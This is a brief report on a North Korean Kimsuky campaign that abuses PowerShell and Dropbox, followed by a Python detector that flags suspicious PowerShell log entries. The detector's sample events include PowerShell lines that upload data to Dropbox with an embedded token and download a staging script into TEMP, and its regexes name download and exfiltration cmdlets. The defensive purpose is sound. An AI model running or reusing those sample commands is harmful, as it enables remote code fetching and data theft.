North Korean threat actors are using trusted services to evade detection. These living-off-the-land (LotL) techniques have been observed in a recent Kimsuky campaign that uses PowerShell scripts and stores data in Dropbox folders. In the campaign, which is being referred to as “DEEP#DRIVE,” Kimsuky has used fake work logs, insurance documents, and other crypto-files to convince users to download and run malicious files. The threat group appears to be focused on stealing sensitive data from South Korea.
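A defender-side illustration of the LotL pattern described above, added here and not drawn from the report: a small Python checker scans constructed PowerShell script-block log entries (shaped like Event ID 4104 ScriptBlockText) and flags only those where a web cmdlet, a hard-coded bearer token or a download into TEMP coincides with a Dropbox hostname, so that a user merely opening Dropbox in a browser is not flagged. The hostnames, cmdlet patterns and sample entries are assumptions for the example, not indicators from the campaign.

```python
import re
from dataclasses import dataclass

# Constructed sample script-block log entries (not real telemetry), shaped like the
# ScriptBlockText field of PowerShell Event ID 4104.
SAMPLE_EVENTS = [
    {"record": 1, "script": "Get-ChildItem C:\\Users\\alice\\Documents | Measure-Object"},
    {"record": 2, "script": "$r = Invoke-RestMethod -Uri https://content.dropboxapi.com/2/files/upload "
                            "-Method Post -Headers @{Authorization='Bearer <token>'}"},
    {"record": 3, "script": "Invoke-WebRequest -Uri https://dl.dropboxusercontent.com/s/abc/stage.ps1 "
                            "-OutFile $env:TEMP\\stage.ps1"},
    {"record": 4, "script": "Start-Process 'https://www.dropbox.com/home'  # user opening their own folder"},
]

# Assumed Dropbox hostnames a script would contact when staging or pulling data.
CLOUD_STORAGE = re.compile(r"(?:api|content)\.dropboxapi\.com|dropboxusercontent\.com|dropbox\.com", re.I)
# PowerShell cmdlets / .NET calls that perform HTTP transfers.
WEB_CMDLETS = re.compile(r"Invoke-WebRequest|Invoke-RestMethod|Net\.WebClient|DownloadString|DownloadFile", re.I)
# A bearer token embedded directly in the script text.
BEARER = re.compile(r"Authorization\s*=\s*'?Bearer", re.I)
# A download written straight into the user's TEMP directory.
TEMP_STAGE = re.compile(r"-OutFile\s+\$env:TEMP", re.I)


@dataclass
class Finding:
    record: int
    reasons: list


def analyze(events):
    """Return a Finding for every entry where a Dropbox host co-occurs with a
    transfer cmdlet, an embedded token, or staging into TEMP."""
    findings = []
    for ev in events:
        text = ev["script"]
        if not CLOUD_STORAGE.search(text):
            continue  # no cloud-storage host: nothing LotL-specific to report
        reasons = []
        if WEB_CMDLETS.search(text):
            reasons.append("web cmdlet contacting Dropbox")
        if BEARER.search(text):
            reasons.append("hard-coded bearer token for Dropbox API")
        if TEMP_STAGE.search(text):
            reasons.append("download staged to TEMP")
        if reasons:
            findings.append(Finding(ev["record"], reasons))
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"record {f.record}: {', '.join(f.reasons)}")
```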